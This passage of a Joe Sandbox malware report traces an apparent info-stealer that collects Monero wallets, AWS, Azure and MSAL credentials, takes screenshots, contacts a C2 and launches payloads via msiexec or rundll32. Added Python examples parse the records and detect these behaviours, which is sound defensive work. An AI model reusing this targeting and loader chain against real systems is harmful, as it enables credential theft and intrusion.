                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCCF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BCD0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BCD0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD208
                    • lstrcat.KERNEL32(?,00BE1478), ref: 00BCD217
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD22A
                    • lstrcat.KERNEL32(?,00BE147C), ref: 00BCD239
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD24C
                    • lstrcat.KERNEL32(?,00BE1480), ref: 00BCD25B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD26E
                    • lstrcat.KERNEL32(?,00BE1484), ref: 00BCD27D
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD290
                    • lstrcat.KERNEL32(?,00BE1488), ref: 00BCD29F
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD2B2
                    • lstrcat.KERNEL32(?,00BE148C), ref: 00BCD2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 00BCD2D4
                    • lstrcat.KERNEL32(?,00BE1490), ref: 00BCD2E3
                      • Part of subcall function 00BDA820: lstrlen.KERNEL32(00BC4F05,?,?,00BC4F05,00BE0DDE), ref: 00BDA82B
                      • Part of subcall function 00BDA820: lstrcpy.KERNEL32(00BE0DDE,00000000), ref: 00BDA885
                    • lstrlen.KERNEL32(?), ref: 00BCD32A
                    • lstrlen.KERNEL32(?), ref: 00BCD339
                      • Part of subcall function 00BDAA70: StrCmpCA.SHLWAPI(013C8FA8,00BCA7A7,?,00BCA7A7,013C8FA8), ref: 00BDAA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCD3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: eca5b0c7382ecd9a4c046922675aba11342280d60769c2a25d5564e2edbf5520
                    • Instruction ID: d9bea7750b229a421924744ac40401577b6af9763135063f9c1a6c69a7ee64ac
                    • Opcode Fuzzy Hash: eca5b0c7382ecd9a4c046922675aba11342280d60769c2a25d5564e2edbf5520
                    • Instruction Fuzzy Hash: 66E138719101089FCB04EBA0DD96EEEB3B8BF14301F1441A9F507B6191EF36AE49DB66
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013CD4B8,00000000,?,00BE144C,00000000,?,?), ref: 00BCCA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BCCA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00BCCA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BCCAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BCCAD9
                    • StrStrA.SHLWAPI(?,013CD4A0,00BE0B52), ref: 00BCCAF7
                    • StrStrA.SHLWAPI(00000000,013CD548), ref: 00BCCB1E
                    • StrStrA.SHLWAPI(?,013CD6E0,00000000,?,00BE1458,00000000,?,00000000,00000000,?,013C8F88,00000000,?,00BE1454,00000000,?), ref: 00BCCCA2
                    • StrStrA.SHLWAPI(00000000,013CD820), ref: 00BCCCB9
                      • Part of subcall function 00BCC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BCC871
                      • Part of subcall function 00BCC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BCC87C
                    • StrStrA.SHLWAPI(?,013CD820,00000000,?,00BE145C,00000000,?,00000000,013C8F98), ref: 00BCCD5A
                    • StrStrA.SHLWAPI(00000000,013C9198), ref: 00BCCD71
                      • Part of subcall function 00BCC820: lstrcat.KERNEL32(?,00BE0B46), ref: 00BCC943
                      • Part of subcall function 00BCC820: lstrcat.KERNEL32(?,00BE0B47), ref: 00BCC957
                      • Part of subcall function 00BCC820: lstrcat.KERNEL32(?,00BE0B4E), ref: 00BCC978
                    • lstrlen.KERNEL32(00000000), ref: 00BCCE44
                    • CloseHandle.KERNEL32(00000000), ref: 00BCCE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: fd37f7b2560c30681d58e9859a40c1803bb39bca3f630b7b304ead6f0ed715d6
                    • Instruction ID: 1652c9909fb3d743f850d7abcfb78c18c27f1ded7f673e8c44480d7bd0e4c44c
                    • Opcode Fuzzy Hash: fd37f7b2560c30681d58e9859a40c1803bb39bca3f630b7b304ead6f0ed715d6
                    • Instruction Fuzzy Hash: A6E11171900148AFDB14EBA4DC91FEEB7B8AF14300F4441AAF50677291EF356A4ACF66
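The API bullets in these function records follow one fixed shape (an optional "Part of subcall function" caller, API.module, a comma-separated argument list of eight-digit hex values, "?" for unknowns or strings the plugin resolved, and a ref address), and the hex constants are where the behaviour hides: 0000001C passed to SHGetFolderPathA is CSIDL_LOCAL_APPDATA, 00400100 passed to HttpOpenRequestA is INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, 0000001F passed to InternetSetOptionA is INTERNET_OPTION_SECURITY_FLAGS, and 00020119 passed to RegOpenKeyExA is KEY_READ|KEY_WOW64_64KEY. The parser below is an added example for triaging such records, not part of the Joe Sandbox report or its IDA plugin. The constant tables are stock Win32 SDK values and cover only the APIs that occur on this page; it assumes resolved string arguments contain no commas, which holds for the lines here.

```python
import re

# One "APIs" bullet as printed in the report, e.g.
#   • StrStrA.SHLWAPI(?,013CD4A0,00BE0B52), ref: 00BCCAF7
#   • Part of subcall function 00BCC820: lstrlen.KERNEL32(?,00000001), ref: 00BCC871
#   • wsprintfA.USER32 ref: 00BD8459
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$",
    re.I,
)
HEX_RE = re.compile(r"-?[0-9A-F]{8}", re.I)

# Win32 SDK values for the constants that appear in this report.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID", 0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
REG_SAM = {0x20019: "KEY_READ", 0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}
CREATE_DISP = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_flags(value, table):
    """Split a bitmask into the named bits of `table`; leftover bits are kept as hex."""
    names, rest = [], value
    for bit, name in table.items():
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else None


# (API name, zero-based argument index) -> decoder for that argument
DECODERS = {
    ("SHGetFolderPathA", 1): lambda v: CSIDL.get(v),
    ("RegOpenKeyExA", 3): lambda v: decode_flags(v, REG_SAM),
    ("CreateFileA", 1): lambda v: decode_flags(v, GENERIC),
    ("CreateFileA", 4): lambda v: CREATE_DISP.get(v),
    ("InternetConnectA", 5): lambda v: {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}.get(v),
    ("HttpOpenRequestA", 6): lambda v: decode_flags(v, INTERNET_FLAGS),
    ("InternetSetOptionA", 1): lambda v: {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}.get(v),
    ("CryptStringToBinaryA", 2): lambda v: {0x1: "CRYPT_STRING_BASE64"}.get(v),
    ("LocalAlloc", 0): lambda v: "LPTR" if v == 0x40 else None,
    # The plugin prints the first DWORD of the SHELLEXECUTEINFO struct; 0x3C is its x86 cbSize.
    ("ShellExecuteEx", 0): lambda v: "SHELLEXECUTEINFOA.cbSize (x86)" if v == 0x3C else None,
}


def parse_arg(text):
    """'?' -> None (unknown), 8 hex digits -> DWORD, anything else -> resolved string literal."""
    if text == "?":
        return None
    if HEX_RE.fullmatch(text):
        return int(text, 16) & 0xFFFFFFFF
    return text


def parse_api_line(line):
    """Return a dict for one API bullet, or None if the line is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(a.strip()) for a in raw.split(",")] if raw else []
    decoded = {}
    for i, v in enumerate(args):
        fn = DECODERS.get((m.group("api"), i))
        if fn and isinstance(v, int):
            name = fn(v)
            if name:
                decoded[i] = name
    return {"caller": m.group("caller"), "api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref"), "decoded": decoded}


def parse_api_lines(lines):
    return [r for r in map(parse_api_line, lines) if r]


# Lines copied from records on this page, used as the sample input.
SAMPLE_LINES = """\
• Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
• lstrcat.KERNEL32(?,\\.aws\\), ref: 00BD4E59
• HttpOpenRequestA.WININET(00000000,GET,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC6385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BC63BF
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BC12D7
• wsprintfA.USER32 ref: 00BD8459
• ShellExecuteEx.SHELL32(0000003C), ref: 00BD31C5
""".splitlines()

if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_LINES):
        print(call["api"], call["decoded"])
```

Run over a whole record, the "decoded" field turns the opaque hex into the sandbox-visible intent: which folder the stealer starts from, which registry view it reads, and what it asks WinINet to do with the C2 connection.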
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • RegOpenKeyExA.ADVAPI32(00000000,013CB148,00000000,00020019,00000000,00BE05B6), ref: 00BD83A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BD8426
                    • wsprintfA.USER32 ref: 00BD8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BD847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD8499
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: same 14 dumps as listed under the first function above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: aa65896ce28dd32415f316dd539c73bc916d27e70af9466f501082f55036974a
                    • Instruction ID: 0f150f2f54a0dafbcac95445c40e26a8eb8b0bba76b08938b97fe8b98d70b5f2
                    • Opcode Fuzzy Hash: aa65896ce28dd32415f316dd539c73bc916d27e70af9466f501082f55036974a
                    • Instruction Fuzzy Hash: CC81FD7191021C9FDB24DB54CC95FEAB7B8FB08700F0482D9E509A6190EF756A89CF95
                    APIs
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00BD4DCD
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD492C
                      • Part of subcall function 00BD4910: FindFirstFileA.KERNEL32(?,?), ref: 00BD4943
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00BD4E59
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FDC), ref: 00BD4971
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE0FE0), ref: 00BD4987
                      • Part of subcall function 00BD4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BD4B7D
                      • Part of subcall function 00BD4910: FindClose.KERNEL32(000000FF), ref: 00BD4B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BD4EE5
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD49B0
                      • Part of subcall function 00BD4910: StrCmpCA.SHLWAPI(?,00BE08D2), ref: 00BD49C5
                      • Part of subcall function 00BD4910: wsprintfA.USER32 ref: 00BD49E2
                      • Part of subcall function 00BD4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BD4A1E
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,013CE9A8), ref: 00BD4A4A
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,00BE0FF8), ref: 00BD4A5C
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,?), ref: 00BD4A70
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,00BE0FFC), ref: 00BD4A82
                      • Part of subcall function 00BD4910: lstrcat.KERNEL32(?,?), ref: 00BD4A96
                      • Part of subcall function 00BD4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BD4AAC
                      • Part of subcall function 00BD4910: DeleteFileA.KERNEL32(?), ref: 00BD4B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: same 14 dumps as listed under the first function above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 72919b6455d5ab07fff9f0407c0cc278be83de293ab0b542df7d26c1f85bee32
                    • Instruction ID: 86977323ea8ab649f0f0979c0127bd2f1835163b440f0b746b0789d5a7bc8426
                    • Opcode Fuzzy Hash: 72919b6455d5ab07fff9f0407c0cc278be83de293ab0b542df7d26c1f85bee32
                    • Instruction Fuzzy Hash: 8A41A37A9402086BDB54F770DC47FED73B8AB24700F0048E4B589661C2FEB59BC98B92
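The routine above resolves a base folder with SHGetFolderPathA, appends \.azure\, \.aws\ and \.IdentityService\ in turn, walks each with FindFirstFileA/FindNextFileA against *.* and PathMatchSpecA, and stages hits with CopyFileA; msal.cache is among its strings. In other words, Azure CLI and AWS CLI credential files and the MSAL shared token cache are collected alongside browser data. The check below is an added example, not part of the report, of turning those path fragments into a hunt over file-access telemetry: it flags any read of one of these stores by a process that is not one of its expected readers. The event shape, the store locations and the allowlist are assumptions to tune per environment.

```python
import re

# Credential stores that the routine above targets, keyed by the path fragment it appends.
# Locations are the stock ones for the AWS CLI, the Azure CLI and the MSAL shared token cache
# (assumed; the sample builds them from SHGetFolderPathA + lstrcat, so any drive or profile works).
CREDENTIAL_STORES = [
    ("aws_cli",    re.compile(r"\\\.aws\\", re.I)),
    ("azure_cli",  re.compile(r"\\\.azure\\", re.I)),
    ("msal_cache", re.compile(r"\\\.IdentityService\\msal\.cache(?:\.[^\\]+)?$", re.I)),
]

# Processes that legitimately read each store. These are assumptions; tune to your environment.
EXPECTED_READERS = {
    "aws_cli":    {"aws.exe", "python.exe", "terraform.exe"},
    "azure_cli":  {"python.exe", "az.cmd", "pwsh.exe", "powershell.exe"},
    "msal_cache": {"outlook.exe", "excel.exe", "winword.exe", "devenv.exe", "teams.exe"},
}


def classify_path(path):
    """Name the credential store a path belongs to, or None."""
    for name, rx in CREDENTIAL_STORES:
        if rx.search(path):
            return name
    return None


def hunt(events):
    """events: iterable of (process image path, file path accessed).
    Returns (store, process, path) for each read by a process outside the store's allowlist."""
    alerts = []
    for image, path in events:
        store = classify_path(path)
        if store is None:
            continue
        proc = image.rsplit("\\", 1)[-1].lower()
        if proc not in EXPECTED_READERS[store]:
            alerts.append((store, proc, path))
    return alerts


# Constructed file-access events in the shape an EDR or a sandbox "files read" list would give.
EVENTS = [
    (r"C:\Users\alice\AppData\Local\Temp\file.exe", r"C:\Users\alice\.aws\credentials"),
    (r"C:\Users\alice\AppData\Local\Temp\file.exe", r"C:\Users\alice\.azure\msal_token_cache.json"),
    (r"C:\Users\alice\AppData\Local\Temp\file.exe", r"C:\Users\alice\AppData\Local\.IdentityService\msal.cache"),
    (r"C:\Program Files\Amazon\AWSCLIV2\aws.exe",    r"C:\Users\alice\.aws\credentials"),
    (r"C:\Users\alice\AppData\Local\Temp\file.exe", r"C:\Users\alice\Documents\notes.txt"),
]

if __name__ == "__main__":
    for store, proc, path in hunt(EVENTS):
        print(f"{store}: {proc} read {path}")
```

A CopyFileA destination under %TEMP% or %LOCALAPPDATA% for one of these files is the same signal from the write side, and is worth a second rule if your telemetry records file creates.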
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BD906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: same 14 dumps as listed under the first function above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: c92ffa3772e90731f227d718e48c6ca0735e7534c9212beb91e54f49e8b5fb62
                    • Instruction ID: 8a5a12a882cabce02a3cf0ae8761999b36504c67cc21b476f52d21af52a7a1c7
                    • Opcode Fuzzy Hash: c92ffa3772e90731f227d718e48c6ca0735e7534c9212beb91e54f49e8b5fb62
                    • Instruction Fuzzy Hash: AB71FB71910208AFDB04EFE5DC89FEEB7B8BB48300F148559F516B7290EB35A945CB61
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD31C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD34EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: same 14 dumps as listed under the first function above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: 02dae87921176b11ec092149eacb5f7161831e79d2ba828e566d52db19da8e0c
                    • Instruction ID: 6d4219c6d14cd56031eacbe85b26f4af75b7f4768a2ecdc8635a17d744327e46
                    • Opcode Fuzzy Hash: 02dae87921176b11ec092149eacb5f7161831e79d2ba828e566d52db19da8e0c
                    • Instruction Fuzzy Hash: A8120E718101489ADB05FBA0DC92FEDF7B8AF14300F5041AAE50676291FF752B4ACFA6
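The strings in this record (C:\Windows\system32\msiexec.exe with /i " and /passive, C:\Windows\system32\rundll32.exe, .msi and .dll) together with the three ShellExecuteEx calls describe the download-and-execute branch: a fetched payload is handed to msiexec for .msi, to rundll32 for .dll, and launched directly otherwise. The detection below is an added example, not part of the report, that flags process-creation events matching that pattern: a silent msiexec install or a rundll32 load whose target sits in a user-writable directory, or either LOLBin spawned by an executable living in one. The Sysmon-style field names, the directory list and the sample events are assumptions.

```python
import re

# Directories an unprivileged user (and therefore a dropped stealer) can write to. Assumed list.
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)|users\\public|programdata|windows\\temp)\\",
    re.I)
MSI_PACKAGE = re.compile(r'(?:^|\s)/i\s+(?:"([^"]+)"|(\S+))', re.I)   # msiexec /i "<package>"
MSI_SILENT = re.compile(r"(?:^|\s)/(?:passive|quiet|q[bn]?)\b", re.I)  # /passive, /quiet, /q, /qn, /qb
DLL_ARG = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)', re.I)                # first DLL token after rundll32


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """event: dict with Image, CommandLine, ParentImage (Sysmon event ID 1 field names).
    Returns a reason string when the event matches the loader pattern, else None."""
    image, cmd, parent = basename(event["Image"]), event["CommandLine"], event["ParentImage"]
    if image == "msiexec.exe":
        m = MSI_PACKAGE.search(cmd)
        pkg = (m.group(1) or m.group(2)) if m else None
        if pkg and USER_WRITABLE.search(pkg) and MSI_SILENT.search(cmd):
            return f"msiexec silent install of package from user-writable path: {pkg}"
    elif image == "rundll32.exe":
        m = DLL_ARG.search(cmd)
        dll = (m.group(1) or m.group(2)) if m else None
        if dll and USER_WRITABLE.search(dll):
            return f"rundll32 loading DLL from user-writable path: {dll}"
    if image in ("msiexec.exe", "rundll32.exe") and USER_WRITABLE.search(parent):
        return f"{image} spawned by executable in user-writable path: {parent}"
    return None


def hunt(events):
    """Return (index, reason) for every event that classify() flags."""
    return [(i, r) for i, r in enumerate(map(classify, events)) if r]


# Constructed process-creation events; the first two mirror the command lines the strings above build.
EVENTS = [
    {"Image": r"C:\Windows\system32\msiexec.exe",
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Users\alice\AppData\Local\Temp\setup.msi" /passive',
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\file.exe"},
    {"Image": r"C:\Windows\system32\rundll32.exe",
     "CommandLine": r'C:\Windows\system32\rundll32.exe "C:\Users\alice\AppData\Local\Temp\mod.dll"',
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\file.exe"},
    {"Image": r"C:\Windows\system32\msiexec.exe",            # package outside user-writable dirs
     "CommandLine": r'C:\Windows\system32\msiexec.exe /i "C:\Program Files\Vendor\app.msi" /qn',
     "ParentImage": r"C:\Windows\system32\svchost.exe"},
    {"Image": r"C:\Windows\system32\rundll32.exe",           # ordinary shell use of rundll32
     "CommandLine": r"C:\Windows\system32\rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for i, reason in hunt(EVENTS):
        print(i, reason)
```

The parent-path clause is what catches the third branch (a downloaded .exe run directly) when it later spawns one of the two LOLBins itself; the payload path and the ShellExecuteEx verb are not in this record, so the rule does not depend on them.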
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC6280: InternetOpenA.WININET(00BE0DFE,00000001,00000000,00000000,00000000), ref: 00BC62E1
                      • Part of subcall function 00BC6280: StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6303
                      • Part of subcall function 00BC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC6335
                      • Part of subcall function 00BC6280: HttpOpenRequestA.WININET(00000000,GET,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC6385
                      • Part of subcall function 00BC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BC63BF
                      • Part of subcall function 00BC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC63D1
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5318
                    • lstrlen.KERNEL32(00000000), ref: 00BD532F
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00BD5364
                    • lstrlen.KERNEL32(00000000), ref: 00BD5383
                    • lstrlen.KERNEL32(00000000), ref: 00BD53AE
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: same 14 dumps as listed under the first function above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
